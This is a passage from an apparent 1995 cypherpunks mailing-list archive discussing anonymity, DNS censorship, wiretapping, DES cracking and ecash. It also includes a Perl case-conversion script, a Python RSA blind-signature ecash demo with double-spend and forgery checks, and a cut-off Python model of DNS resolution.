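    """True if m is a nonzero 128-bit value whose two 64-bit halves match."""
    low_mask = 2**HALF_BITS - 1
    return 0 < m < 2**(2 * HALF_BITS) and (m >> HALF_BITS) == (m & low_mask)


def blind(m, r=None):
    """Step 2: Alice multiplies the coin by r^e mod n; r stays her secret."""
    while r is None or math.gcd(r, N) != 1:
        r = 2 + secrets.randbelow(N - 2)
    return (m * pow(r, E, N)) % N, r


def unblind(blind_sig, r):
    """Step 4: divide out r, leaving the bank's ordinary signature m^d mod n."""
    return (blind_sig * pow(r, -1, N)) % N


class Bank:
    def __init__(self):
        self.seen_blinded = []        # everything the bank observes at withdrawal
        self.spent = set()            # coins already deposited

    def sign(self, blinded):
        """Step 3: sign the blinded value; the coin inside is not visible."""
        self.seen_blinded.append(blinded)
        return pow(blinded, D, N)

    def deposit(self, m, sig):
        """Accept a coin once, and only if it is signed and in coin form."""
        if pow(sig, E, N) != m:
            return "bad signature"
        if not is_recognizable(m):
            return "not a coin"
        if m in self.spent:
            return "already spent"
        self.spent.add(m)
        return "ok"


def demo():
    bank = Bank()
    coin = make_coin()
    blinded, r = blind(coin)
    sig = unblind(bank.sign(blinded), r)
    first = bank.deposit(coin, sig)
    second = bank.deposit(coin, sig)          # same coin presented again
    # Under raw RSA any chosen s "verifies" against m = s^e mod n, so the
    # redundant coin form is what lets the bank reject such a value.
    chosen_sig = 123456789                    # constructed value
    formless = bank.deposit(pow(chosen_sig, E, N), chosen_sig)
    # Neither the coin nor its signature appears in what the bank signed.
    linked = coin in bank.seen_blinded or sig in bank.seen_blinded
    return first, second, formless, linked


if __name__ == "__main__":
    print(demo())
```

The spent-coin set models only the bank-side check at deposit; it does not cover the payee-binding variants speculated about in the message.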




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@wmono.remailer (Anonymous)
Date: Thu, 2 Nov 1995 22:36:58 +0800
To: cypherpunks@toad.com
Subject: Re: [FRED] Anonymity and Integrity
Message-ID: <199511021410.IAA06974@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


[note: i'm not the original 'anonymous user' in this thread]

>If the message was not of any particular import to anyone, integrity
>would not be a very big issue, but suppose you took quotes out of
>context and cleverly tried to construct a picture of the other person
>as not being reputable.  People who read the message might believe that
>what you said was true, or at least had a grain of truth to it.  That
>sort of message lacks integrity, and the reason it lacks integrity is
>because it has anonymity, not just because it's false and misleading.

I, for one, pay very little attention to the author of any
given message on this list, and messages stand on their own
merit. I take everything I read (here and elsewhere) with
a grain of salt, and pay close attention to factual references
if they are supplied so I can do my own investigating and
draw my own conclusions, if the topic piques my interest.

An anonymous posting has exactly the same 'integrity quotient'
as any first-time poster; the reader has no historical perspective
on the author, and the message should be  accepted or discarded
on its own merits, not by a blind "he's usually clueful" or
"who the heck is this?" attitude.

[erm.. I'm not attacking anyone here, just spewing some thoughts
 I haven't bothered to express yet..]

(...)

>Example: I have two (N) pseudonyms that put forth different points of
>view specifically directed to create different kinds of credence to
>different audiences.  If the audiences knew that both (several) of the
>pseudonyms were in fact the same person, they would have very different
>beliefs about the individual given the combined picture than they might
>get from any one of the pictures.

[Obligatory _Ender's Game_ reference grudgingly suppressed]

This happens in 'real life' all the time. I hide the details
of my geeky job from my Friday-night friends, and don't bring
up my recreational pharmaceutical use with my business associates.
Either group would have different feelings about me if they
had a 'combined picture' of my lifestyle. 

>It's not only the True Name that's at issue.  It's the association of a

Personally, I find the quest for employment of any True Name scheme
hogwash, simply because of the multifaceted nature of human existence
(see above), where pseudonymity (virtual or social) is a part of 
everyday life.

True Names are logically almost impossible anyway. What base criteria
would a government, company, or other organization use to assign
and make use of a True Name? Driver's license? (fake) .. DNA fingerprint?
(cloning) .. any attempt to pin /me/ down to a single facet of 
existence is doomed to failure, given how adept the bad guys are
at keeping ahead of the good guys.

>set of messages and historical information with a source.  For example,
>if we knew you were a KGB agent working in the disinformation and
>economic espionage branches, we might evaluate your postings differently
>than if we knew you were a high-school student from Duluth whose father
>taught her a lot about cryptography when she was young.

We all have hidden agendas; personally, until I reach godlike status
(btw, anyone have any spare eye of newt laying around?) I'll have
to be content with judging most things I read with a healthy dose 
of cynicism, and squeeze what 'truth' I can out of it. I've been 
surprised too many times by hidden goals and 'double agents' to put
much stock in /anything/ sent down my pipe.

There's also an argument that the most prolific pseudonyms and 'real'
account-holders have Something They Want Us To Believe and should be
trusted no further than they can be thrown .. analogous, in my book,
to politicians .. perhaps the anonymous are the /only/ entities we
can trust...

--

Oinker - anonymous today in case any of you are my clients :P





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 2 Nov 1995 21:25:45 +0800
To: cypherpunks@toad.com
Subject: [NOISE] (Was: Re: US government department for crime...)
Message-ID: <199511021311.IAA59742@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

John Young wrote, in his unique style:

>Still, anonymous does make an astutely ironic observation, in 
>humorous lifting of the customary FinCEN cloak:
>
>That the hydra-headed agency may be literally aim at financial 
>*crimes* enforcement rather than enforcement of the laws 
>against such deeds.
>
>
>Especially given the participating renegade agencies who seem 
>to absolve themselves of these laws.
>
>
>Perhaps anonymous is right, they are a band of outlaws, daring 
>to overtly flaunt it, expecting no opposition from the gullible 
>cowed.
>

<I take the bait...> Actually, it's *two* bands of outlaws in
concert, and the "gullible cowed" are beginning to clamor for
anything else. This could be an interesting election year, if
the media would ever-in-hell get out of lap-dog mode and into
watch-dog mode. [I know...I'm not holding my breath.]
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

"Thank God we don't get all the government we pay for."  Will Rogers

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
Featuring cypherpunk privacy stuff and some of my babypictures!
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 3 Nov 1995 03:10:50 +0800
To: cypherpunks@toad.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <DHEtE6.FB6@sgi.sgi.com>
Message-ID: <199511021747.JAA08919@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DHEtE6.FB6@sgi.sgi.com>, Mark Murray <mark@grondar.za> writes:

>> ? "Gut feel" suggests to me that large amounts of "predicted" input might
>> be worse than the normal sort of system noise you have been using.
>> 
>> But keep in mind that what we're doing is XOR'ing the input data into
>> the pool.  (Actually, it's a bit more complicated than that.  The input
>> is XOR'ed in with a CRC-like function, generated by taking an
>> irreducible polynomial in GF(2**128).  But for the purposes of this
>> argument, you can think of it as XOR.)  So since you don't know what the
>> input state of the pool is, you won't know what the output state of the
>> pool.

> I chatted with a colleague at work, and he helped bend my mind right.
> I had the mistaken notion that adding lots of data would "overflow"
> and "dilute" the entropy to an attackable state.

I think the problem is not merely flooding the device with non-random
input data.  If you coordinate sucking out entropy with feeding in
non-random data you can suck the real entropy in the system down to zero
while making the driver think it has plenty of randomness.  While it's
not clear to me how this would lead to an attack, it would be worrisome.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 3 Nov 1995 04:40:13 +0800
To: dreschs@mpd.tandem.com (Sten Drescher)
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511021624.KAA05751@galil.austnsc.tandem.com.>
Message-ID: <199511021810.KAA14547@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	Is it?  This is the _one_ thing in the article (is that term
> giving it too much legitimacy?) that I thought was barely true.  Whoever
> controls the root level DNS servers effectively controls the Internet.
> I postulated a couple of months ago about how the US Govt might attempt
> to censor the rest of the world: "Remove lurid.porno.site.other-country
> from your DNS system within 72 hours or we will remove references to
> your DNS servers from the root level servers.".  (I also speculated that
> if the US Govt tried doing this, that an 'underground' DNS system would
> form almost immediately.)
> 

	The US govt. doesn't run the root nameservers, nor are all the
root nameservers within US jurisdiction.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Fri, 3 Nov 1995 01:45:01 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511020847.AAA10833@jobe.shell.portal.com>
Message-ID: <199511021624.KAA05751@galil.austnsc.tandem.com.>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <llurch@networking.stanford.edu> said:

RG> On Thu, 2 Nov 1995 anonymous-remailer@shell.portal.com wrote:

>> But control of Internet domain name registration means the ability to
>> remove troublesome-or outspoken-computer systems from the
>> network. Po- tentially, this control also confers the power to
>> insinuate "phantom" domains into the network-for surveillance
>> purposes, for example-or for real-time, automatic censorship.

RG> Anyone capable of sending this message should have known that this
RG> was complete BS.

	Is it?  This is the _one_ thing in the article (is that term
giving it too much legitimacy?) that I thought was barely true.  Whoever
controls the root level DNS servers effectively controls the Internet.
I postulated a couple of months ago about how the US Govt might attempt
to censor the rest of the world: "Remove lurid.porno.site.other-country
from your DNS system within 72 hours or we will remove references to
your DNS servers from the root level servers.".  (I also speculated that
if the US Govt tried doing this, that an 'underground' DNS system would
form almost immediately.)

>> Furthermore, anecdotal evidence gathered by this author suggests that
>> actual "truth control" is taking place on the 'net now. E-mail
>> messages with controversial contents-including the details of the
>> SAIC takeover of domain names-have consistently disappeared as they
>> travel across the network.

RG> And now we have PROOF! For THIS VERY MESSAGE, sent to THIS VERY LIST
RG> only EIGHT HOURS AGO was MYSTERIOUSLY DISAPPEARED! Hide the women
RG> and children!

	At least, it was allegedly lost.  If I were wanting to hype it,
I'd just _claim_ that it was lost.

		Sten
-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 3 Nov 1995 08:49:35 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511021624.KAA05751@galil.austnsc.tandem.com.>
Message-ID: <Pine.ULT.3.91.951102101918.21219C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 2 Nov 1995, Sten Drescher wrote:

> Rich Graves <llurch@networking.stanford.edu> said:
> 
> RG> On Thu, 2 Nov 1995 anonymous-remailer@shell.portal.com wrote:
> 
> >> But control of Internet domain name registration means the ability to
> >> remove troublesome-or outspoken-computer systems from the
> >> network. Potentially, this control also confers the power to
> >> insinuate "phantom" domains into the network-for surveillance
> >> purposes, for example-or for real-time, automatic censorship.
> 
> RG> Anyone capable of sending this message should have known that this
> RG> was complete BS.
> 
> 	Is it?  This is the _one_ thing in the article (is that term
> giving it too much legitimacy?) that I thought was barely true.  Whoever
> controls the root level DNS servers effectively controls the Internet.
> I postulated a couple of months ago about how the US Govt might attempt
> to censor the rest of the world: "Remove lurid.porno.site.other-country
> from your DNS system within 72 hours or we will remove references to
> your DNS servers from the root level servers.".  (I also speculated that
> if the US Govt tried doing this, that an 'underground' DNS system would
> form almost immediately.)

I stand corrected. SurfWatch already allows people and organizations to do
this voluntarily for anything that mentions sex. I am sure that certain
sites are blocked by China, Vietnam, Singapore, and Fortune 1000
Corporations, for both "moral" and political reasons. 

But it's not the DNS you need to control -- it's the routers. Which are 
still rather distributed. BBN is part of the Eastern Elite, though...

- -rich


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 3 Nov 1995 05:22:52 +0800
To: cypherpunks@toad.com
Subject: Re: Transcript of Bernstein hearing is now available
In-Reply-To: <9511020308.AA25206@toad.com>
Message-ID: <199511021951.LAA03152@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> John Gilmore <gnu@toad.com> writes:
> We received the transcript of October 20's oral hearing from the court
> stenographer.  It's up on the EFF Web site at:

> http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/951020_hearing.transcript

I find it hard to read things in all upper case.  Here's a slowish 95%
hack to make it more legible.  I imagine there's a 5-line way to do it
twenty times faster for 99% success, but what the heck...

	Jim Gillogly
	Highday, 12 Blotmath S.R. 1995, 19:47

-----------------------------------------------------------------------
#!/usr/bin/perl
# delegal: quick-n-dirty case conversion for Bernstein transcript
# 2 Nov 95, Gillogly

@propers =
( "daniel", "dan", "marilyn", "hall", "patel", "california", "bernstein",
  "united", "department", "state", "cohn", "coppolino", "national",
  "security", "agency", "steefel", "levitt", "weiss", "court", "i",
  "mc", "glashan", "sarrall", "lee", "tien", "ed", "ross", "susan", "arnold",
  "justice", "anthony", "mandel", "bazarov", "appeals", "helme", "webster",
  "states", "dorfmont", "constitution", "constitutional", "doe", "schechter",
  "snuffle", "june", "lowell", "cj", "edler", "olc", "mr", "ninth",
  "circuit", "judge", "ritchie", "english", "dr", "freedman", "o", "brien",
  "pentagon", "cubby", "compuserve", "golden", "gate", "san", "francisco",

);

$INDENT_UPALL = 13;     # If indented deeper than this, upcase each word
$INDENT_UPCOLON = 6;    # If indented with a colon and these spaces, upcase
$INDENT_PARA = 10;      # If indented this deep, upcase first word
$INDENT_SENT = 2;       # Pick up sentence starts

while ($proper = pop(@propers))
{
	($first, $rest) = ($proper =~ /^(.)(.*)$/);
	$first =~ tr/a-z/A-Z/;
	$caps{$proper} = $first . $rest;
}


while (<>)
{
	tr/A-Z/a-z/;            # Downcase everything
	s/u\.s\./U.S./g;        # special case
	s/d\.c\./D.C./g;        # special case
	s/([^a-z])nsa([^a-z])/$1NSA$2/g;  # Another one
	s/([^a-z])itar([^a-z])/$1ITAR$2/g;  # Another one

	# Upcase known proper names
	while (($proper, $cap) = each(%caps))
	{
		($first, $rest) = ($proper =~ /^(.)(.*)$/);
		s/([^a-z])$proper([^a-z])/$1$cap$2/g;
	}
	# If it's indented deeply, upcase each word
	if (/ {$INDENT_UPALL}/ || /: {$INDENT_UPCOLON}/)
	{
		while (($low) = /[^a-zA-Z]([a-z])/)
		{
			$low =~ tr/a-z/A-Z/;
			s/([^a-zA-Z])[a-z]/$1$low/;
		}
	}
	# Upcase middle initials
	while (($init) = / ([a-z])\./)
	{
		$init =~ tr/a-z/A-Z/;
		s/ [a-z]\./ $init\./;
	}
	# Upcase paragraphs
	if (($init) = / {$INDENT_PARA}([a-z])/)
	{
		$init =~ tr/a-z/A-Z/;
		s/( {$INDENT_PARA})[a-z]/$1$init/;
	}
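	# Sentences
	chomp;
	# Split off the leading line number; lines with no text keep their number
	($num, $text) = /^([ \d]*)(.*)$/;
	while (($init) = $text =~ /[^ ] {$INDENT_SENT}([a-z])/)
	{
		$init =~ tr/a-z/A-Z/;
		# Anchor on the same non-space so the matched letter is the one replaced
		$text =~ s/([^ ] {$INDENT_SENT})[a-z]/$1$init/;
	}
	$_ = $num . $text . "\n";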


	print $_;
}
-----------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 3 Nov 1995 02:10:11 +0800
To: Jay Campbell <cypherpunks@toad.com
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <199511020955.BAA04564@you.got.net>
Message-ID: <9511021709.AA03831@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



On this topic...

We had lunch with the deputy director of the NSA yesterday. In between
agreeing to put backdoors in the Internet, help round up subversives and
build a DES cracker :-) the topic of telephone tapping came up.


One point that was quite clear, a lot of what happens in the federal 
government has more to do with the agency structure than common sense.
When the NSA are being asked to comment on an export license they
are being asked "is this thing dangerous", not "should it be exported".
But when the response comes back to commerce "it's dangerous" you can 
hardly expect the person on the other end to put their neck out on the
line and risk allowing an export license.

Put another way this is a bureaucracy where the objective is to avoid
the negative rather than gamble for a positive. Where risks are taken
they are calculated bureaucratic risks.

What is needed is a federal task force to reevaluate the crypto 
export issue. This should look at whether the effect of the embargo
is positive or negative. Of course the result would be known in 
advance but would provide a shield to hide behind. Would be useful
if some other counterproductive policies were re-examined at the same
time, like the persecution of Phil Zimmerman.

On ITAR he did say that the policy met the desired objective. The 
particular objective concerned was not stated however. Probably if
they could tell us the objective we could provide a solution but then
again if they told us it would probably defeat the objective in itself.


On telephone tapping the statement was made that they do not allow 
unauthorized taps and that technology was making wildcat taps by
local officials harder. Which makes sense. If the taps are performed
digitally they should be easier to monitor at a management level.
It is a fair point that just because technology has changed the 
nature of the game it should not mean that wiretaps cease to be 
possible.

What is very odd however is the FBI request for $500 million. This is
a somewhat large quantity of money to say the least. The telephone
switches are programmable these days, it should be possible to 
provide tapping at substantially less cost. Mind you the Federal
government is not known for tight cost control. The NSA reckoned that
a DES cracker would cost substantially more than $1 million because
the system costs would be much higher than the component costs.
"And it would only be able to operate on one keystream at once", also
note "DES is used more for authenticity than for confidentiality by
banks". One reading, the NSA can get the info they need at less cost than
breaking DES because the financial feeds are using DES to provide
CBC residues for MACs rather than encryption. Anyway the NSA price 
estimate was "two or more orders of magnitude more in cost". I dispute
that since we brought in the ZEUS trigger system at around $40 million
five years ago and it is vastly more complex than a DES cracker, this
constitutes a system cost of about ten times the raw component cost.
There was considerably more component diversity and system complexity
than any cypher machine would need. The raw input bandwidth of 
6 Terabytes/sec would chew up DES keyspace very quickly (ie it
is equivalent to exhausting a 40bit keyspace in a second).

If the NSA want a cheap DES cracker they have my number. I'll take 5%
of the difference between the actual cost and $100 million (their
estimate of cost) as my fee.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rajaram@morgan.com (P. Rajaram)
Date: Fri, 3 Nov 1995 02:06:00 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: ecash remailer
In-Reply-To: <199511020239.SAA27491@ix.ix.netcom.com>
Message-ID: <9511021209.ZM7820@morgan.com>
MIME-Version: 1.0
Content-Type: text/plain


On Nov 2,  7:23am, Hal wrote:
> Subject: Re: ecash remailer
> It's very frustrating to have to speculate so much due to the lack of
> information.  Imagine how we would react if Cybercash or Netscape had
> gone forward with what they claimed were secure protocols but had
> refused to publish them, referring simply to old papers on RSA and
> DES.  Yet Digicash gets away with this.

So, refuse to buy their money.
Demand open systems.

If you feel like being more terroristic, get Markoff to write an article
on how a cypherpunk expert feels that the Mark Twain Bankshares system
'may' be insecure.

-r




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "BITNET POSTMASTER" <POSTMAST@MVS.MEDCTR.UCLA.EDU>
Date: Fri, 3 Nov 1995 07:46:49 +0800
To: <cypherpunks@toad.com>
Subject: Reply to ERROR: MAX RETRIES E
Message-ID: <X5306122746>
MIME-Version: 1.0
Content-Type: text/plain


*** Sent by Alternate User "LM#LK" for "POSTMAST" ***
*** Original Author:  DRESCHS @ TANDEM - ** Remote User **; 11/02/95 12:27

>Message ID: X5306122746 WAS FORWARDED BY POSTMASTER@MGMT
>Original sender: DRESCHS    @TANDEM
>
>Received: from relay3.UU.NET by MVS.MEDCTR.UCLA.EDU (IBM MVS SMTP V2R2.1)
>   with TCP; Thu, 02 Nov 95 12:27:32 PDT
>Received: from toad.com by relay3.UU.NET with SMTP
> id QQzodt13430; Thu, 2 Nov 1995 15:16:35 -0500 (EST)
>Received: by toad.com id AA12091; Thu, 2 Nov 95 11:58:50 PST
>Received: from devnull (devnull.mpd.tandem.com) by toad.com id AA12085; Thu, 2
> Nov 95 11:58:42 PST
>Received: from galil.austnsc.tandem.com. by devnull (8.6.8/8.6.6)
> id NAA03606; Thu, 2 Nov 1995 13:58:28 -0600
>Received: (from dreschs@localhost) by galil.austnsc.tandem.com. (8.7.1/8.7.1) i
> OAA09507; Thu, 2 Nov 1995 14:00:32 -0600 (CST)
>Date: Thu, 2 Nov 1995 14:00:32 -0600 (CST)
>From: Sten Drescher <dreschs@mpd.tandem.com>
>Message-Id: <199511022000.OAA09507@galil.austnsc.tandem.com.>
>To: sameer <sameer@c2.org>
>Cc: cypherpunks@toad.com
>In-Reply-To: sameer's message of Thu, 2 Nov 1995 10:10:43 -0800 (PST)
>Subject: Re: censored? corrected  Steve Pizzo cited in The Spotlight
>References: <199511021624.KAA05751@galil.austnsc.tandem.com.>
> <199511021810.KAA14547@infinity.c2.org>
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>
sameer <sameer@c2.org> said:

>>  Is it?  This is the _one_ thing in the article (is that term giving
>> it too much legitimacy?) that I thought was barely true.  Whoever
>> controls the root level DNS servers effectively controls the
>> Internet.  I postulated a couple of months ago about how the US Govt
>> might attempt to censor the rest of the world: "Remove
>> lurid.porno.site.other-country from your DNS system within 72 hours
>> or we will remove references to your DNS servers from the root level
>> servers.".  (I also speculated that if the US Govt tried doing this,
>> that an 'underground' DNS system would form almost immediately.)
>>

s>  The US govt. doesn't run the root nameservers, nor are all the
s> root nameservers within US jurisdiction.

 Granted, the US Govt doesn't run the US-based root servers.
But, if an Internet 'Decency' law was passed, they certainly could try
to threaten the US-based root server maintainers to make the cascading
threats.  And, as I understand the way DNS resolution works, address
requests go down to your root domain then up from the other root domain,
i.e., for me to find out what c2.org's address is, my system requests
from:
NS mpd.tandem.com
NS tandem.com
NS com
NS org

If this is correct, if the com NS has the entry for the org NS, I won't
be able to resolve those names.  Of course, explicit IP addresses and

*** Comments From: POSTMAST - POSTMASTER, BITNET; 11/02/95 12:54
Can someone please tell me how to remove/unsubscribe an email address
from this mail list.  I need the exact commands.  Apparently someone
subscribed to this list using an invalid email address and all the mail
messages are ending up in a bounced mail file.  We need to get this
email address unsubscribed.  Thank you for your help.

Postmaster
mvs.medctr.ucla.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 3 Nov 1995 04:32:49 +0800
To: hallam@w3.org
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <199511020955.BAA04564@you.got.net>
Message-ID: <9511021924.AA12407@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
 > It is a fair point that just because technology has changed the 
 > nature of the game it should not mean that wiretaps cease to be 
 > possible.

I disagree that this is a "fair point".  That wiretaps are possible is
an accident of design.  Just because that slice of the salami appears
gone, I see no reason to concede that it can't be re-attached.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Nov 1995 08:46:56 +0800
To: cypherpunks@toad.com
Subject: EMU_boo
Message-ID: <199511021830.NAA29064@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-2-95. FT:


   "Electronic money in a race with Emu."

      Economic and monetary union or electronic money? Recent
      suggestions that the start of Emu might be delayed
      beyond 1999 raise the intriguing possibility that a
      viable international electronic money will be available
      before the European single currency. Depending on your
      perspective, this would be either disaster or nirvana.
      Disaster, because governments and central banks in
      countries with weak currencies would lose the seignorage
      that currency issue brings, and the sovereignty it is
      supposed to provide (but may not). Disaster, because it
      would destroy two central aims of Emu: the sharing of
      power between monetary authorities, and the attempted
      imposition of currency soundness by institutional fiat.
      Nirvana, because it would provide people with a powerful
      protection against the random and hidden taxation
      imposed on them when governments inflate, and because it
      would create monetary soundness via market forces.


   EMU_boo  (5 kb)


   FT on the Web: <www.ft.com> or <www.usa.ft.com>. Selections
   available, not this one, but read today's "Smart building"
   for the security and ID gadgets to track-attack-siphon.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Nov 1995 07:47:06 +0800
To: cypherpunks@toad.com
Subject: ECC_boo
Message-ID: <199511021831.NAA29402@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-2-95. W$Japer:


   "Happy, Healthy and Odd: Nonconformists Live Longer."

      For modern-day eccentrics, computer hackers
      qualified, as did academics, scientists, rock stars and
      artists. Traits: nonconforming; creative; strongly
      motivated by curiosity; idealistic (wanting to make the
      world a better place and the people in it happier);
      cheerfully obsessed with one or more hobbyhorses; aware
      from early childhood of being different; intelligent,
      opinionated, outspoken; convinced of being right and
      that the rest of the world is out of step;
      noncompetitive (not in need of reassurance from the rest
      of society); unusual in eating habits and living
      arrangements; not particularly interested in the
      opinions or the company of other people, except to
      persuade them to his point of view; possessed of a
      mischievous sense of humor; single; usually the eldest
      or an only child; a bad speller.


   ECC_boo  (9 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Nov 1995 04:31:53 +0800
To: cypherpunks@toad.com
Subject: CBW_boo
Message-ID: <199511021832.NAA29795@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-2-95. W$Japer:


   "Chemical and Biological Warfare Unmasked."

      For the first time in more than 25 years, the U.S. may
      be waking up to the seriousness of CBW. This high-level
      awakening is long overdue and reflected in a sudden
      increase in CBW sensor development research and counter-
      proliferation programs. Still, these steps blithely
      disregard 25 years of revolutionary advances in the
      biological and chemical sciences and the potential
      products of the Russian program. There is no allowance
      for "nonmilitary" CBW applications. Yet the most
      troublesome developments in the Russian CBW program are
      agents designed for covert use against diplomats,
      politicians and business executives. Also absent is
      serious attention to terrorist motivations and options.


   CBW_boo  (9 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Fri, 3 Nov 1995 07:54:16 +0800
To: sameer <sameer@c2.org>
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511021624.KAA05751@galil.austnsc.tandem.com.>
Message-ID: <199511022000.OAA09507@galil.austnsc.tandem.com.>
MIME-Version: 1.0
Content-Type: text/plain


sameer <sameer@c2.org> said:

>>  Is it?  This is the _one_ thing in the article (is that term giving
>> it too much legitimacy?) that I thought was barely true.  Whoever
>> controls the root level DNS servers effectively controls the
>> Internet.  I postulated a couple of months ago about how the US Govt
>> might attempt to censor the rest of the world: "Remove
>> lurid.porno.site.other-country from your DNS system within 72 hours
>> or we will remove references to your DNS servers from the root level
>> servers.".  (I also speculated that if the US Govt tried doing this,
>> that an 'underground' DNS system would form almost immediately.)
>> 

s> 	The US govt. doesn't run the root nameservers, nor are all the
s> root nameservers within US jurisdiction.

	Granted, the US Govt doesn't run the US-based root servers.
But, if an Internet 'Decency' law was passed, they certainly could try
to threaten the US-based root server maintainers to make the cascading
threats.  And, as I understand the way DNS resolution works, address
requests go down to your root domain then up from the other root domain,
i.e., for me to find out what c2.org's address is, my system requests
from:
NS mpd.tandem.com
NS tandem.com
NS com
NS org

If this is correct, if the com NS has the entry for the org NS, I won't
be able to resolve those names.  Of course, explicit IP addresses and
/etc/hosts entries would still work.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
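
The scenario in the message above, as an added example that is not part of the original post: a small model of a resolver that starts at the root and follows referrals downward, showing what a dropped root delegation breaks, how long cached referrals mask it, and why /etc/hosts entries and an alternate ("underground") root keep working. Zone names come from the post; the addresses, TTL ticks and all class and function names are constructed for illustration.

```python
# Constructed model of DNS delegation. Zone names follow the post above; every
# address is made up (192.0.2.0/24 is reserved for documentation) and the TTLs
# are logical ticks, not seconds.

def covers(zone_name, host):
    """True when host is the zone apex or lies below it ("" is the root)."""
    return zone_name == "" or host == zone_name or host.endswith("." + zone_name)


class Zone:
    """One authoritative server: address records plus referrals to child zones."""

    def __init__(self, name):
        self.name = name            # "" is the root
        self.addresses = {}         # host name -> IP address
        self.delegations = {}       # child zone name -> (Zone, ttl)

    def delegate(self, child, ttl=2):
        self.delegations[child.name] = (child, ttl)

    def referral_for(self, host):
        """Most specific (Zone, ttl) delegation covering host, or None."""
        best = None
        for zname, entry in self.delegations.items():
            if covers(zname, host) and (best is None or len(zname) > len(best[0].name)):
                best = entry
        return best


class Resolver:
    """Iterative resolver: hosts file first, then cached referrals, then the root."""

    def __init__(self, root, hosts=None):
        self.root = root
        self.hosts = dict(hosts or {})  # stands in for /etc/hosts
        self.cache = {}                 # zone name -> (Zone, expires_at)
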